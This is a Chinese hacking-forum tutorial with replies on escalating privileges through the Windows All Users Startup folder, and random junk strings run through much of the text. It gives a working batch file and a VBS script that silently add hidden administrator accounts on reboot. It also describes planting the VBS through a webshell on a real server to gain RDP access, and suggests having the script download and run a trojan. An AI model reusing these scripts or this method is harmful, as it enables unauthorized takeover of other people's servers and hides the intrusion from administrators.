3AST提权课程之启动项提权
大家好,我是完美蚂蚁 今天给大家带来的提权教程是G}2\/J;[k9X Y启动 提权
C:\Docume~1\All Users\「开始」菜单\程序\启动
在这里必须有写入权限 否则此方法无效K P6y:w4kl UCj1K
因为我是在网吧 这里显示不了路径
我去服务器上演示给大家看!a'n2`Bh'Mr/[`/bR
大家看到了把 就是这个路径 在这个里面写入文件 等候服务器从起 就会自动执行我们的
文件 从而运行我们的文件
这里有两中方式 第一种是批处理`3T o?WD3h
我们来看下目前 我机器上的用户组!c6~Vqm7S/uKl
目前我们没有521这个用户P.B/eo'^R{F
看到了把 已经添加到管理组中去了 刚才我们运行程序的时候 一闪而过一个黑色提示
大家看到了吧 如果是在服务器上运行 一样会有这个提示的 细心的管理员有可能发现C,a,M?{'[
下面我们来介绍第二中方法使用VBS脚本 大家都知道VBS脚本是没有这个提示的
大家看 已经成功加入了WMMY用户
网络实战才是我们练手的目的 我已经找到一个含有这种漏洞的WBESHELL了x h:mh1\M
当前终端服务端口: 3389
系统自动登录功能未开启8rW_)^8{R%[6H
3389 已经打开了 我们只需要拥有一个管理员权限的用户就可以了
C:\Docume~1\All Users\「开始」菜单\程序\启动 这个是默认的路径5lD JY.q
第一种隐蔽性太差 我们就用第二种吧
已经写入了 我们只需要等待服务器从起 那个VBS脚本文件就会把我们的用户加入进去
从而取得了3389的登陆权限
其实在VBS脚本中 我们不一定需要添加管理员帐户可以 直接让VBS下载运行我们的木马/L nM^g8r*M~
基本原理都差不多 我就不多介绍了
教程结束```1v XU-htE
@echo off0C t/L"^%RBH1}
net user 521 521 /add&ct-n_$dn6UVy6d
net localgroup administrators 521 /add
2EBH"VZu Pu_:M
on Error Resume nextL4n9a_2m
set wshshell=createobject("wscript.shell")PO `|`8B$W N
a=wshshell.run("net user wmmy$ 1227 /add",0)$Zp+Sk'l ~ n.P
a=wshshell.run("net localgroup administrators wmmy$ /add",0)
$]zp't d&k
[url=http://www.namipan.com/d/5a1c90d3c0c7bfdbdd39841576ba4a153844b7d9fe5e6100][size=5]点击下载[/size]
[/url] 不建议是用纳米~~很垃圾~。 +个分 能要是管理的权限啊~。 写的不错哦~~~~~tZ W6y9o;GR9c
昨天有事情没有上了 顶下~一下加这么多啊~BS下~:lol 顶下小柔H w2l+j2sd
看看~;P
页:
[1]
